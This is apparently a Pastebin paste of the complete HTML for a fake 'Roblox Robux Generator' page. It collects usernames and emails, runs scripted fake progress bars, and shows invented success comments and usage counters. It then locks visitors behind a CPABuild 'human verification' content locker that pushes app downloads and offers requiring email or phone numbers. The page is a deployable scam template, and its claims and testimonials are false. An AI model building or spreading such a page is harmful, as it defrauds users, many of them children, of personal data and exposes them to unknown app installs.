Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html><head>
- <meta name="viewport" content="width=device-width, initial-scale=1">
- <link href="https://fonts.googleapis.com/css?family=Josefin+Sans" rel="stylesheet">
- <title>Roblox Robux Generator</title>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
- <script src="js/jscriptsv4.js"></script>
- <script type="text/javascript">
- var CPABUILDSETTINGS={"it":81367,"key":"16011"};
- </script>
- <script src="https://cpabuild.com/public/external/locker.js"></script><script type="text/javascript" src="http://cpabuild.com/public/external/v2/html.81367.16011.0.js" id="CPABUILDMAINJS"></script><link rel="stylesheet" href="http://cpabuild.com/public/external/css_front.css" id="CPABUILDGLOBALSTYLE">
- <style>
- html {
- background: url("img/bg.jpg") no-repeat center center fixed;
- background-size: cover;
- }
- body {
- text-align: center;
- font-family: 'Josefin Sans', sans-serif;
- }
- img {
- display: block;
- margin-left: auto;
- margin-right: auto;
- }
- table {
- margin-left:auto;
- margin-right:auto;
- }
- select.input-command {
- height: 46px;
- line-height: 46px;
- font-family: 'Josefin Sans', sans-serif;
- }
- .form-option {
- margin-left: 15px;
- margin-right: 30px;
- margin-bottom: 15px;
- font-family: 'Josefin Sans', sans-serif;
- }
- .input-form {
- background-color: #fff;
- background-image: none;
- border: 1px solid #ccc;
- box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
- color: black;
- display: block;
- font-size: 14px;
- height: 20px;
- line-height: 1.42857;
- padding: 6px 12px;
- transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
- vertical-align: middle;
- width: 100%;
- font-family: 'Josefin Sans', sans-serif;
- }
- .input-form::-moz-placeholder {
- color: #999;
- opacity: 55;
- }
- .input-command {
- font-size: 18px;
- height: 28px;
- line-height: 1.33;
- padding: 10px 16px;
- }
- .wrapper {
- padding: 0;
- margin: -136px auto 0;
- }
- .wrapper img {
- width: 60%;
- }
- .robux {
- background: url("img/robux.png") no-repeat scroll 10px center white;
- padding-left: 40px !important;
- }
- .tix {
- background: url("img/tix.png") no-repeat scroll 10px center white;
- padding-left: 40px !important;
- }
- .buttonstyle {
- border-radius: 6px;
- background-color: #111c30;
- border: none;
- color: white;
- padding: 16px 33px;
- display: inline-block;
- font-size: 33px;
- height: auto;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- font-family: 'Josefin Sans', sans-serif;
- }
- #shield{
- margin-bottom: 5px;
- }
- #progressbarcontainer {
- display: none;
- position: relative;
- margin-left: auto;
- margin-right: auto;
- width: 90%;
- height: 50px;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- }
- #progressbar {
- position: absolute;
- width: 10%;
- height: 100%;
- background-color: #111c30;
- }
- #progressbarlabel {
- line-height: 54px;
- text-align: center;
- color: white;
- }
- #main-tool {
- background: #eeeeee;
- max-width: 500px;
- margin: 100px auto 20px;
- padding: 50px;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- }
- #steps {
- background: #eeeeee;
- max-width: 500px;
- margin: 100px auto 20px;
- padding: 50px;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- }
- #comment {
- background: #eeeeee;
- max-width: 500px;
- margin: 100px auto 20px;
- padding: 50px;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- }
- #verifybg {
- height: 0%;
- width: 100%;
- left: 0;
- top: 0;
- position: fixed;
- z-index: 1;
- overflow-x: hidden;
- transition: 0.5s;
- background-color: rgb(0,0,0);
- background-color: rgba(0,0,0, 0.3);
- }
- #verify {
- margin-left: auto;
- margin-right: auto;
- color: white;
- position: relative;
- background-color: #207189;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- width: 80%;
- }
- #verifycontent {
- margin-left: auto;
- margin-right: auto;
- width: 80%;
- }
- #gen1 {
- display: none;
- }
- #gen2 {
- display: none;
- }
- #gen3 {
- display: none;
- }
- #gen4 {
- display: none;
- }
- #gen5 {
- display: none;
- }
- #gen6 {
- display: none;
- }
- #gen7 {
- display: none;
- }
- #addrobuxbarcontainer {
- position: relative;
- margin-left: auto;
- margin-right: auto;
- width: 60%;
- height: 30px;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- }
- #addrobuxbar {
- position: absolute;
- width: 1%;
- height: 100%;
- background: #111c30;
- }
- #addrobuxbarlabel {
- line-height: 30px;
- text-align: center;
- color: white;
- font-family: 'Josefin Sans', sans-serif;
- }
- #addtixbarcontainer {
- position: relative;
- margin-left: auto;
- margin-right: auto;
- width: 60%;
- height: 30px;
- box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
- }
- #addtixbar {
- position: absolute;
- width: 1%;
- height: 100%;
- background: #111c30;
- }
- #addtixbarlabel {
- line-height: 30px;
- text-align: center;
- color: white;
- font-family: 'Josefin Sans', sans-serif;
- }
- #mobileverify {
- display: inline;
- }
- #desktopverify {
- display: none;
- }
- @media screen and (min-width: 1200px) {
- #mobileverify {
- display: none;
- }
- #desktopverify {
- display: block;
- }
- #verify {
- width: 30%;
- }
- }
- @media screen and (max-width: 1199px) {
- #mobileverify {
- display: block;
- }
- #desktopverify {
- display: none;
- }
- #verify {
- width: 90%;
- }
- }
- </style><link data-it="81367" rel="stylesheet" id="CPABUILDSPECIFICSTYLE" href="http://cpabuild.com/public/clockers/HumanVerification/css.css"><style type="text/css" id="CPABUILDSettingsCSS">#CPABUILD_MODAL_CONTAINER strong{color:#00a8ff}
- #CPABUILD_MODAL_CONTAINER #CPABUILDMODALTITLE{color:#272727}
- #CPABUILD_MODAL_CONTAINER #CPABUILDMODALFOOTER{color:#000000}
- #CPABUILD_MODAL_CONTAINER #CPABUILD_MODAL{font-family:Arial}
- #CPABUILD_MODAL_CONTAINER #CPABUILDMODALCONTENT{animation-duration: 600ms;-webkit-transition: all 600ms;transition: all 600ms;transition-duration: 600ms;}#CPABUILD_MODAL_CONTAINER #CPABUILD_MODAL {background-color: rgba(0,0,0,0.6) }</style><script id="CPABUILDLEADCHECK" type="text/javascript" src="http://cpabuild.com/public/external/check.php?time=1488652037289&it=81367"></script></head>
- <body>
- <div id="verifybg">
- <br>
- <br>
- <br>
- <div id="verify">
- <br>
- <br>
- <br>
- <div id="verifycontent">
- <h1>HUMAN VERIFICATION REQUIRED</h1>
- <img src="img/head.png" width="30%">
- <div id="mobileverify">
- <p>In Order to Keep Our Software Stay Undetected From Automatic Bot, Please Follow the Steps Below</p>
- <p>1. Click the Button Below</p>
- <p>2. Download 1 Free App (Run It for 30 Seconds)</p>
- <p>3. or Complete an Offer on the List (Submit Your Email or Mobile Number)</p>
- <p>4. Your Robux & Tix Will be Added to Your Game After This</p>
- <a href="verify.html"><button class="buttonstyle">VERIFY</button></a>
- </div>
- <div id="desktopverify">
- <p>In Order to Keep Our Software Stay Undetected From Automatic Bot, Please Complete the Verification Process.</p>
- <button onclick="CPABuildLock()" class="buttonstyle">VERIFY</button>
- </div>
- </div>
- <br>
- <br>
- <br>
- </div>
- </div>
- <div id="main-tool">
- <div class="wrapper"><img src="img/logo.png"></div>
- <h1>ROBLOX ROBUX GENERATOR PRO V166.39</h1>
- <div id="progressbarcontainer">
- <div id="progressbar">
- <div id="progressbarlabel">0%</div>
- </div>
- </div>
- <p></p><div id="progresslog"></div><p></p>
- <div id="gen7">
- <img src="img/bestrobux.png" width="30%">
- <br>
- <div id="addrobuxbarcontainer">
- <div id="addrobuxbar">
- <div id="addrobuxbarlabel">0</div>
- </div>
- </div>
- </div>
- <div id="gen6">
- <img src="img/besttix.png" width="30%">
- <br>
- <div id="addtixbarcontainer">
- <div id="addtixbar">
- <div id="addtixbarlabel">0</div>
- </div>
- </div>
- </div>
- <div id="gen5"><img src="img/outrageous.png" width="30%"></div>
- <div id="gen4"><img src="img/usernameconfirm.png" width="30%"></div>
- <div id="gen3"><img src="img/searchingusername.svg" width="30%"></div>
- <div id="gen2"><img src="img/connectserversuccess.png" width="30%"></div>
- <div id="gen1"><img src="img/connectserver.svg" width="30%"></div>
- <div id="fillup">
- <div class="form-option">
- <input id="username" class="input-form input-command" maxlength="30" type="text" placeholder="YOUR USERNAME / EMAIL ADDRESS">
- </div>
- <div class="form-option">
- <select id="device" class="input-form input-command">
- <option>iOS</option>
- <option>Android</option>
- <option>Xbox One</option>
- <option>Xbox 360</option>
- <option>Windows</option>
- <option>macOS</option>
- <option>Fire OS</option>
- <option>iPod touch</option>
- </select>
- </div>
- <div class="form-option">
- <select id="robux" class="input-form robux input-command">
- <option value="50000">50,000</option>
- <option value="100000">100,000</option>
- <option value="250000">250,000</option>
- <option value="500000">500,000</option>
- </select>
- </div>
- <div class="form-option">
- <select id="tix" class="input-form tix input-command">
- <option value="50000">50,000</option>
- <option value="100000">100,000</option>
- <option value="250000">250,000</option>
- <option value="500000">500,000</option>
- </select>
- </div>
- <input id="shield" type="checkbox"><label for="shield"><b>Free Upgarde to Outrageous Builder Club For 24 Months (Optional)</b></label>
- <br><br>
- <button class="buttonstyle" onclick="move()"><b>GENERATE</b></button>
- <p><b>TOOL UPDATED:</b> <span id="date">Mar 4, 2017</span></p>
- <p><b>TOTAL ROBUX+TIX GENERATED TODAY:</b><br><span id="resources">13693827</span></p>
- <p><b>TOTAL USERS ONLINE NOW:</b> <span id="randomnumber">9052</span></p>
- </div>
- </div>
- <div id="steps">
- <h2>How to Use the Generator</h2>
- <p>We offer unlimited Robux & Tix in this user-friendly generator in just 3 simple steps</p>
- <p><b>Step 1:</b> select your operating system</p>
- <p><b>Step 2:</b> choose how much Robux & Tix you need to generate</p>
- <p><b>Step 3:</b> click Generate Button and the system will start to generate Robux & Tix automatically</p>
- <p><b>Warning:</b> use the generator only once per username per day or your account might be banned</p>
- </div>
- <div id="comment">
- <form class="comment">
- <header>Recent Comments</header>
- <fieldset>
- <label class="input">
- <b>Dave767</b> said:<br>Yasss!! Just received all of the robux!<br><br>
- <img src="img/results1.jpg" width="80%">
- <br><br><i>Posted Today Seconds ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>Jayson</b> said:<br>I'm so happy I can have all the robux & tix I want.
- <br><br><i>Posted Today Moments ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>judymarcs111</b> said:<br>Great! It worked for me!
- <br><br><i>Posted 3 hours ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>Williamhddd</b> said:<br>I thought it was a scam but it works!
- <br><br><i>Posted 6 hours ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>MelvinChen</b> said:<br>Alright, it's working I just got everything
- <br><br><i>Posted 9 hours ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>JohnsonKgny10</b> said:<br>For those who use this generator, please don't leak it to public, so we can be the only group of strongest players in roblox.
- <br><br><i>Posted 1 day ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>ShirleyJPope</b> said:<br>This is my result after using this generator.<br><br>
- <img src="img/results2.jpg" width="60%">
- <br><br><i>Posted 1 day ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <label class="input">
- <b>DonaldPeckham</b> said:<br>So good, you can see I received 500k on my Roblox account.<br><br>
- <img src="img/results3.jpg" width="80%">
- <br><br><i>Posted 2 days ago</i>
- </label><br>
- </fieldset>
- <fieldset>
- <section>
- <label class="textarea">
- <textarea style="width: 90%" rows="3" name="review" id="review" placeholder="Please Enter Your Comment"></textarea>
- </label>
- </section>
- <div id="comments" class="row hide">
- <section class="col col-6">
- <label class="input">
- <input style="width: 90%" name="name" id="name" type="text" placeholder="Your Name">
- </label>
- </section>
- <section class="col col-6">
- <label class="input">
- <input style="width: 90%" name="email" id="email" type="email" placeholder="Your Email Address">
- </label>
- </section>
- </div>
- </fieldset>
- <fieldset>
- <center>You can post your result here after using the generator.</center>
- </fieldset>
- </form>
- </div>
- <h4>Copyright 2016 - 2017</h4>
- <div id="CPABUILD_MODAL_CONTAINER" style="display: none;"><div id="CPABUILD_MODAL">
- <div id="CPABUILDMODALCONTENT" class="CPABUILD_animateTop">
- <div id="CPABUILDMODALHEADER"> <button type="button" class="close" id="CPABUILD_MODAL_CLOSE" aria-label="Close"><i id="CPABUILD_MODAL_ICON" class="fa fa-lock"></i></button>
- <div id="CPABUILDMODALTITLE">Please Follow the Steps Below to Complete the Verification</div> </div>
- <div id="CPABUILDMODALBODY">
- <iframe id="CPABUILDOFFERS" scrolling="no" src=""></iframe>
- </div>
- <div id="CPABUILDMODALFOOTER">
- <p id="CPABUILDMODALFOOTERTEXT">Your Robux & Tix Will be Generated After Completing The Last Step.</p>
- </div>
- </div>
- </div>
- </div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment